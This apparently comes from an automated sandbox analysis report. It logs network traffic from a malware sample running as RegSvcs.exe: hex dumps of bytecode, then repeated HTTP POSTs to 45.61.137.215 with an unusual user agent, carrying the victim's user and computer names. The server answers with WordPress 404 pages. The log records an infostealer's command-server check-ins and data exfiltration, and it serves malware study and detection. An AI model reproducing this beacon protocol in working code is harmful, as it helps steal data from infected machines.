                                            May 29, 2024 15:42:07.743184090 CEST1236INData Raw: 08 09 6e 08 8e 69 6a 5d d4 91 13 0b 11 04 11 0b 58 11 06 09 95 58 20 ff 00 00 00 5f 13 04 20 cc 8e fb 0e 13 0c 11 0c 20 06 8f fb 0e fe 02 13 21 11 21 2c 09 20 c2 8e fb 0e 13 0c 2b 1d 11 0c 20 f8 8e fb 0e fe 02 16 fe 01 13 22 11 22 2c 08 11 0c 17
                                            Data Ascii: nij]XX _ !!, + "",X+##,+%$$,+ %%, + &&,X+ '', + ((,X+
                                            May 29, 2024 15:42:07.743197918 CEST1236INData Raw: 5f 6a 61 d2 9c 00 11 4a 17 6a 58 13 4a 11 4a 11 07 8e 69 17 59 6a fe 02 16 fe 01 13 4f 11 4f 3a 76 ff ff ff 02 7b 22 00 00 04 72 cb 01 00 70 6f 42 00 00 0a 00 02 7b 23 00 00 04 1f 0c 1f 0c 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 23 00 00 04 72 d5
                                            Data Ascii: _jaJjXJJiYjOO:v{"rpoB{#s2o3{#rpo5{#2#sUoV{#o{#o{#o{#o{$ M s2o3{$rpo5{$KsUoV{$o7
                                            May 29, 2024 15:42:07.743213892 CEST1236INData Raw: 00 0a 28 ae 00 00 0a 13 06 72 a5 0b 00 70 28 ac 00 00 0a 00 28 ad 00 00 0a 28 ae 00 00 0a 13 08 72 db 0b 00 70 28 ac 00 00 0a 00 28 ad 00 00 0a 28 ae 00 00 0a 13 07 00 72 68 08 00 70 0b 07 73 af 00 00 0a 13 09 11 09 6f b0 00 00 0a 00 72 0d 0c 00
                                            Data Ascii: (rp(((rp(((rhpsorp(X%r3p%(%rp%%rp%%rp%%rp%%rp%(%rp%(%rp%(%rp%(
                                            May 29, 2024 15:42:07.747870922 CEST1236INData Raw: 04 6f b2 00 00 0a 72 72 12 00 70 08 6f b3 00 00 0a 26 73 b4 00 00 0a 13 05 11 04 73 b5 00 00 0a 13 06 11 06 11 05 6f b6 00 00 0a 26 06 6f b7 00 00 0a 00 11 05 6f b8 00 00 0a 6f b9 00 00 0a 16 31 1c 11 05 6f b8 00 00 0a 16 6f ba 00 00 0a 6f bb 00
                                            Data Ascii: orrpo&sso&ooo1oooo+9D(r~p(4(rhpsorpsorrpo&o8/rp(X%rp%o


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.94971245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:10.038269997 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 172
                                            Connection: close
                                            May 29, 2024 15:42:10.043184042 CEST172OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: 'ckav.rutina528110TINA-PCk0FDD42EE188E931437F4FBE2CETozH
                                            May 29, 2024 15:42:12.499260902 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:10 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:12.499285936 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:12.499311924 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:12.499326944 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:12.499351978 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:42:12.499366999 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:12.499391079 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:42:12.499403954 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:42:12.499419928 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:42:12.499774933 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.94971445.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:12.652340889 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 172
                                            Connection: close
                                            May 29, 2024 15:42:12.657429934 CEST172OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: 'ckav.rutina528110TINA-PC+0FDD42EE188E931437F4FBE2ClmHmF
                                            May 29, 2024 15:42:15.220684052 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:13 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:15.220729113 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:42:15.221035004 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:42:15.221084118 CEST224INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
                                            May 29, 2024 15:42:15.221096992 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:42:15.221127987 CEST224INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !impo
                                            May 29, 2024 15:42:15.221138000 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:42:15.221158981 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:42:15.221175909 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:15.221185923 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.94971545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:15.295733929 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:15.300714016 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:17.733454943 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:15 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:17.733470917 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:42:17.733504057 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:42:17.733521938 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:42:17.733532906 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
